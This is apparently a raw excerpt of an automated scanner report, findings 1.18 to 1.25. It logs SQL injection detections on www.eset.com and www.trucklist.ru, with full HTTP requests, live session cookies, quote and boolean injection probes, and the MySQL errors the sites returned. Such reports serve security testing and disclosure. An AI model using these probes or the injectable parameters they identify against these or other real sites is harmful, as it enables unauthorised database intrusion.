Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286; __utmb=5781286.2.10.1303735972

Response 2

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 3005
Content-Type: application/x-javascript
Expires: Tue, 24 Apr 2012 13:10:53 GMT
Last-Modified: Thu, 31 Dec 2009 16:47:40 GMT
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 13:11:51 GMT

function WebForm_FindFirstFocusableChild(control) {
if (!control || !(control.tagName)) {
return null;
}
var tagName = control.tagName.toLowerCase();
if (tagName == "undefined") {
return null;
}
var children = control.childNodes;
if (children) {
for (var i = 0; i < children.length; i++) {
try {
if (WebForm_CanFocus(children[i])) {
return children[i];
}
else {
var focused = WebForm_FindFirstFocusableChild(children[i]);
if (WebForm_CanFocus(focused)) {
return focused;
}
}
} catch (e) {
}
}
}
return null;
}
function WebForm_AutoFocus(focusId) {
var targetControl;
if (__nonMSDOMBrowser) {
targetControl = document.getElementById(focusId);
}
else {
targetControl = document.all[focusId];
}
var focused = targetControl;
if (targetControl && (!WebForm_CanFocus(targetControl)) ) {
focused = WebForm_FindFirstFocusableChild(targetControl);
}
if (focused) {
try {
focused.focus();
if (__nonMSDOMBrowser) {
focused.scrollIntoView(false);
}
if (window.__smartNav) {
window.__smartNav.ae = focused.id;
}
}
catch (e) {
}
}
}
function WebForm_CanFocus(element) {
if (!element || !(element.tagName)) return false;
var tagName = element.tagName.toLowerCase();
return (!(element.disabled) &&
(!(
...[SNIP]...
1.18. http://www.eset.com/us/ [PHPSESSID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.eset.com
Path:   /us/

Issue detail

The PHPSESSID cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the PHPSESSID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6'%20and%201%3d1--%20; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=check#true#1303736408|session#1303736347554-914602#1303738208|PC#1303736347554-914602.17#1304945949; __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738202515%3B%20gpv_pageName%3Dus/store%7C1303738202519%3B%20s_nr%3D1303736402523-Repeat%7C1335272402523%3B%20s_invisit%3Dtrue%7C1303738202525%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/store%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BaddMboxValue%25252528%25252527ns_form_1%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B

Response 1

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=rhlh0535fscpi8b9l3gmc676d2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 15:15:10 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26653
Date: Mon, 25 Apr 2011 15:15:10 GMT
X-Varnish: 555648175
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
+"="+escape(cookieValue)
    + ";expires="+expire.toGMTString();
   }

   var speed = 'fast';
   
   var j = jQuery.noConflict();
       var selectedTab = 0;
   j(document).ready(function(){
       j("#bannerWrapper").css({'left': '-'+(980*selectedTab)+'px'});
       j("#tab"+selectedTab).show();
       j("#tab"+selectedTab).addClass('visible');        
       j("#link_tab"+selectedTab).addClass('selected');
       
       
       j(".clicker").live('click',function(){
           var linkId = j(this).attr('id').split('_');
           var tab = linkId[1];
           var indx = null;
           j('.clicker').each(function(){
               if(j(this).hasClass('selected'))
               {
                   
                   indx = j(this).attr('id').split('_');
                   j(this).removeClass('selected');
               }
           });
           
           indexNum = indx[1].replace(/[^\d]+/i,'');
           var clicked = tab.replace(/[^\d]+/i,'');

           var diff = clicked-indexNum;
           
           j('#bannerWrapper').animate({"left":"-="+(980*diff)},speed);
       
           
           j(this).addClass('selected');

           
           
           j('.visible').fadeOut(speed,function(){
               j(this).removeClass('visible');
               j('#'+tab).fadeIn(speed);
               j('#'+tab).addClass('visible');
               SetCookie('tab', selectedTab,-1);
               SetCookie('tab', clicked,1);
           });
           
           return false;
       });
       
   });
</script>
<style type="text/css" media="all">
   div.hidden{
       display:none;
   }
   div.visible{
       display: block;
   }
   
   div.page_banner{
       width: 980px;
       float: left;
   }
   
   div#bannerWrapper {
       width: 1960px;
       position: absolute;
       left: 0;
   }
   
   
</style>
<div style="width: 980px; overflow: hidden; height: 250px;">
   <div id="bannerWrapper" >
       <div class="page_banner" id="img_tab0">
            <a href="/us/home/smart-security"><div style="display:block; position: absolute; height: 250px; width: 980px;"></div></a>
   <h1>
       <div style="background-image:url(/us/images/banners/banner_home_ecs_pc.jpg); width:980px; height:250px;">
       <div style="position:absolute; top:127px; left: 433px">
                               <a href="/us/home/smart-security" ><img src="/us/images/sub_banner_button_buy.jpg" alt="Buy ESET Smart Security 4" style="margin-right:10px" /></a>
       
...[SNIP]...

Request 2

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6'%20and%201%3d2--%20; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=check#true#1303736408|session#1303736347554-914602#1303738208|PC#1303736347554-914602.17#1304945949; __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738202515%3B%20gpv_pageName%3Dus/store%7C1303738202519%3B%20s_nr%3D1303736402523-Repeat%7C1335272402523%3B%20s_invisit%3Dtrue%7C1303738202525%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/store%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BaddMboxValue%25252528%25252527ns_form_1%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B

Response 2

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=p3m54lfgguit56nu0eqstd1vf5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=4; expires=Fri, 24-Jun-2011 15:15:11 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26683
Date: Mon, 25 Apr 2011 15:15:11 GMT
X-Varnish: 555648227
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
e+"="+escape(cookieValue)
    + ";expires="+expire.toGMTString();
   }

   var speed = 'fast';
   
   var j = jQuery.noConflict();
   var selectedTab = 0;
   j(document).ready(function(){
       j("#tab"+selectedTab).show();
       j("#tab"+selectedTab).addClass('visible');        
       j("#link_tab"+selectedTab).addClass('selected');
       j("#bannerWrapper").css({'left': '-'+(980*selectedTab)+'px'});
       
       j(".clicker").live('click',function(){
           var linkId = j(this).attr('id').split('_');
           var tab = linkId[1];
           var indx = null;
           j('.clicker').each(function(){
               if(j(this).hasClass('selected'))
               {
                   
                   indx = j(this).attr('id').split('_');
                   j(this).removeClass('selected');
               }
           });
           
           indexNum = indx[1].replace(/[^\d]+/i,'');
           var clicked = tab.replace(/[^\d]+/i,'');

           var diff = clicked-indexNum;
           
           j('#bannerWrapper').animate({"left":"-="+(980*diff)},speed);
       
           
           j(this).addClass('selected');

           
           
           j('.visible').fadeOut(speed,function(){
               j(this).removeClass('visible');
               j('#'+tab).fadeIn(speed);
               j('#'+tab).addClass('visible');
               SetCookie('tab', selectedTab,-1);
               SetCookie('tab', clicked,1);
           });
           
           return false;
       });
       
   });
</script>
<style type="text/css" media="all">
   div.hidden{
       display:none;
   }
   div.visible{
       display: block;
   }
   
   div.page_banner{
       width: 980px;
       float: left;
   }
   
   div#bannerWrapper {
       width: 1960px;
       position: absolute;
       left: 0;
   }
   
   
</style>
<div style="width: 980px; overflow: hidden; height: 250px;">
   <div id="bannerWrapper">
       <div class="page_banner" id="img_tab0">
            <a href="/us/home/smart-security"><div style="display:block; position: absolute; height: 250px; width: 980px;"></div></a>
   <h1>
       <div style="background-image:url(/us/images/banners/banner_home_ecs_pc.jpg); width:980px; height:250px;">
       <div style="position:absolute; top:127px; left: 433px">
                               <a href="/us/home/smart-security" ><img src="/us/images/sub_banner_button_buy.jpg" alt="Buy ESET Smart Security 4" style="margin-right:10px" /></a>
                       
...[SNIP]...
1.19. http://www.trucklist.ru/cars/undefined [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /cars/undefined

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /cars'/undefined HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=94358872.1303741294.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=94358872.676514869.1303741294.1303741294.1303741294.1; __utmc=94358872; __utmb=94358872.1.10.1303741294; subscribe_list_data=%7B%22type%22%3A%22SearchAds%22%2C%22category%22%3A%2245%22%2C%22region%22%3A%226586%22%2C%22filter_currency%22%3A%222715%22%2C%22filter_photo%22%3A%220%22%7D

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 15:00:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:45:31 GMT
Content-Length: 6600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /cars''/undefined HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=94358872.1303741294.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=94358872.676514869.1303741294.1303741294.1303741294.1; __utmc=94358872; __utmb=94358872.1.10.1303741294; subscribe_list_data=%7B%22type%22%3A%22SearchAds%22%2C%22category%22%3A%2245%22%2C%22region%22%3A%226586%22%2C%22filter_currency%22%3A%222715%22%2C%22filter_photo%22%3A%220%22%7D

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 15:00:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 15:00:18 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
1.20. http://www.trucklist.ru/cars/undefined [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /cars/undefined

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /cars/undefined' HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=94358872.1303741294.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=94358872.676514869.1303741294.1303741294.1303741294.1; __utmc=94358872; __utmb=94358872.1.10.1303741294; subscribe_list_data=%7B%22type%22%3A%22SearchAds%22%2C%22category%22%3A%2245%22%2C%22region%22%3A%226586%22%2C%22filter_currency%22%3A%222715%22%2C%22filter_photo%22%3A%220%22%7D

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 15:02:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 15:02:39 GMT
Content-Length: 6600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /cars/undefined'' HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=94358872.1303741294.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=94358872.676514869.1303741294.1303741294.1303741294.1; __utmc=94358872; __utmb=94358872.1.10.1303741294; subscribe_list_data=%7B%22type%22%3A%22SearchAds%22%2C%22category%22%3A%2245%22%2C%22region%22%3A%226586%22%2C%22filter_currency%22%3A%222715%22%2C%22filter_photo%22%3A%220%22%7D

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 15:02:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:48:03 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
1.21. http://www.trucklist.ru/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /favicon.ico' HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=94358872.1303741294.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=94358872.676514869.1303741294.1303741294.1303741294.1; __utmc=94358872; __utmb=94358872.1.10.1303741294; subscribe_list_data=%7B%22type%22%3A%22SearchAds%22%2C%22category%22%3A%2245%22%2C%22region%22%3A%226586%22%2C%22filter_currency%22%3A%222715%22%2C%22filter_photo%22%3A%220%22%7D

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 15:00:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 15:00:05 GMT
Content-Length: 6594

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...
1.22. http://www.trucklist.ru/plugins/ajax/enums.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /plugins/ajax/enums.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

POST /plugins/ajax/enums.php' HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
Origin: http://www.trucklist.ru
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30
Content-Length: 19

name=truck_make_&_=

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:49:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:49:45 GMT
Content-Length: 6616

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...
1.23. http://www.trucklist.ru/plugins/ajax/enums.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /plugins/ajax/enums.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

POST /plugins/ajax/enums.php/1' HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
Origin: http://www.trucklist.ru
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30
Content-Length: 19

name=truck_make_&_=

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:48:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:33:25 GMT
Content-Length: 6620

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...
1.24. http://www.trucklist.ru/vendors/calendar/super_calendar.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /vendors/calendar/super_calendar.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /vendors/calendar/super_calendar.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:47:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:32:52 GMT
Content-Length: 6640

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...
1.25. http://www.trucklist.ru/webroot/delivery/css/global.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/css/global.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /webroot/delivery/css/global.css'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
